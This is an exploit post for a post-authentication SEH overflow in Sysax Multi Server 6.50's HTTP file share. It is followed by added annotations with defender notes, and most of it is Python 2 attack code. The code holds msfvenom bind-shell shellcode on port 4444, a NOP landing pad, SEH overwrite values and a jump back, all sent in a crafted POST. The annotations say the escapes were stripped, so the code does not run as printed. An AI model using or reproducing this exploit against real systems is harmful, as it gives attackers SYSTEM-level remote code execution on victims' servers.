Sysax Multi Server 6.50 SEH Overflow
Posted on 22 March 2016
# Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit # Date: 03/21/2016 # Exploit Author: Paul Purcell # Contact: ptpxploit at gmail # Vendor Homepage: http://www.sysax.com/ # Vulnerable Version Download: http://download.cnet.com/Sysax-Multi-Server/3000-2160_4-76171493.html (6.50 as of posting date) # Version: Sysax Multi Server 6.50 # Tested on: Windows XP SP3 English # Category: Remote Code Execution # # Timeline: 03/11/16 Bug found # 03/14/16 Vendor notified # 03/17/16 Vendor acknowledges issue and publishes patch (6.51) # 03/21/16 Exploit Published # # Summary: This is a post-authentication exploit that requires the HTTP file sharing service to be running on # Sysax Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the # service. Once exploited, the shellcode runs with SYSTEM privileges. In this example, we attack folder_ # in dltslctd_name1.htm. The root path of the user shouldn't break the buffer offset in the stack, though # the user will need to have permission to delete folders. If the user has file delete permissions, file_ # will work as well. mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can # be modified to adapt to a user's permissions. 
# Proof-of-concept for the Sysax Multi Server 6.50 HTTP file-share SEH overflow described in
# the header above (post-authentication; the header records a vendor fix in 6.51).
# Kept verbatim: the listing was collapsed onto two physical lines during extraction and the
# byte-string escapes lost their backslashes, so it is not runnable as printed.  It is
# documented here, not repaired.  Python 2 (`httplib`).
#
# What the code does, as written:
#   * `target`/`port` name the server; `sid` is a session id copied from the browser URL after
#     login (so a valid account is a precondition).
#   * `buff` is the POST payload for the `folder_` form field (the comment says `file_` works
#     with file-delete permission): 26400 filler bytes, a 296-byte landing pad, the
#     msfvenom `windows/shell_bind_tcp` (LPORT 4444) shellcode, filler up to the SEH record,
#     a short jump (nseh), a pop/pop/ret address attributed to RPCNS4.dll (seh), a backward
#     jump into the landing pad, and 9500 trailing bytes -- roughly 37 KB with proper escapes.
#   * `head` is a hand-built header block, but it is passed as the *third positional*
#     argument of `HTTPConnection.request`, i.e. as the request body.  httplib therefore
#     emits its own request line, Host and Content-Length; the header-like text (including
#     "Content-Length: 1337") travels inside the POST body ahead of `buff`.
#
# Defender notes (derived only from the values above):
#   * Impact: the header states the shellcode runs as SYSTEM; the chosen payload is a bind
#     shell, so an unexpected TCP/4444 listener on a Sysax host is a post-exploitation
#     indicator.
#   * Detection: a POST to /scgi?sid=...&pid=dltslctd_name1.htm whose body is tens of
#     kilobytes, begins with HTTP-header-looking text, and carries long runs of a single
#     byte (0x41, 0x90, 0x44) in the folder_/file_ field.
#   * Mitigation: upgrade to 6.51 or later (per the header's timeline); limit exposure of
#     the HTTP file-share service and the folder/file delete permission this path requires.
import httplib target = 'webbackup' port = 80 sid = '57e546cb7204b60f0111523409e49bdb16692ab5' #retrieved from browser URL after login #example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm #msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "x00x0a" shell=("x6ax52x59xd9xeexd9x74x24xf4x5bx81x73x13xd7xae" "x73xe9x83xebxfcxe2xf4x2bx46xf1xe9xd7xaex13x60" "x32x9fxb3x8dx5cxfex43x62x85xa2xf8xbbxc3x25x01" "xc1xd8x19x39xcfxe6x51xdfxd5xb6xd2x71xc5xf7x6f" "xbcxe4xd6x69x91x1bx85xf9xf8xbbxc7x25x39xd5x5c" "xe2x62x91x34xe6x72x38x86x25x2axc9xd6x7dxf8xa0" "xcfx4dx49xa0x5cx9axf8xe8x01x9fx8cx45x16x61x7e" "xe8x10x96x93x9cx21xadx0ex11xecxd3x57x9cx33xf6" "xf8xb1xf3xafxa0x8fx5cxa2x38x62x8fxb2x72x3ax5c" "xaaxf8xe8x07x27x37xcdxf3xf5x28x88x8exf4x22x16" "x37xf1x2cxb3x5cxbcx98x64x8axc6x40xdbxd7xaex1b" "x9exa4x9cx2cxbdxbfxe2x04xcfxd0x51xa6x51x47xaf" "x73xe9xfex6ax27xb9xbfx87xf3x82xd7x51xa6x83xdf" "xf7x23x0bx2axeex23xa9x87xc6x99xe6x08x4ex8cx3c" "x40xc6x71xe9xc6xf2xfax0fxbdxbex25xbexbfx6cxa8" "xdexb0x51xa6xbexbfx19x9axd1x28x51xa6xbexbfxda" "x9fxd2x36x51xa6xbex40xc6x06x87x9axcfx8cx3cxbf" "xcdx1ex8dxd7x27x90xbex80xf9x42x1fxbdxbcx2axbf" "x35x53x15x2ex93x8ax4fxe8xd6x23x37xcdxc7x68x73" "xadx83xfex25xbfx81xe8x25xa7x81xf8x20xbfxbfxd7" "xbfxd6x51x51xa6x60x37xe0x25xafx28x9ex1bxe1x50" "xb3x13x16x02x15x83x5cx75xf8x1bx4fx42x13xeex16" "x02x92x75x95xddx2ex88x09xa2xabxc8xaexc4xdcx1c" "x83xd7xfdx8cx3c") arg="folder_" #can also be changed to file_ if user has file delete permissions pid="dltslctd_name1" #Can be changed, though padding will needed to be updated as well junk1="A"*26400 #Initial pile of junk noppad="x90"*296 #Place to land from our long jump and before our shellcode junkfill="x90"*(768-len(shell)) #Fill in after our shellcode till nseh nseh="xebx06x90x90" #Short jump over SEH seh="xd7x2ax92x5d" #pop esi # pop edi # ret RPCNS4.dll jump="xe9x13xfcxffxff" #jump back 1000 bytes for plenty of room for your shellcode junk2="D"*9500 
# Request assembly and send.  Note that `head` becomes the body (third positional argument),
# and that the hand-built "Content-Length: 1337" does not reflect the real body size --
# httplib computes its own Content-Length for the body it sends.
#Junk at the end buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2) head = "Host: Wee! " head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0 " head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 " head += "Accept-Language: en-us,en;q=0.5 " head += "Accept-Encoding: gzip, deflate " head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm " head += "Proxy-Connection: keep-alive " head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425 " head += "Content-Length: 1337 " head += "If-Modified-Since: * " head += " " head += "-----------------------------217830224120 " head += " " head += " " head += " " head += buff conn = httplib.HTTPConnection(target,port) conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)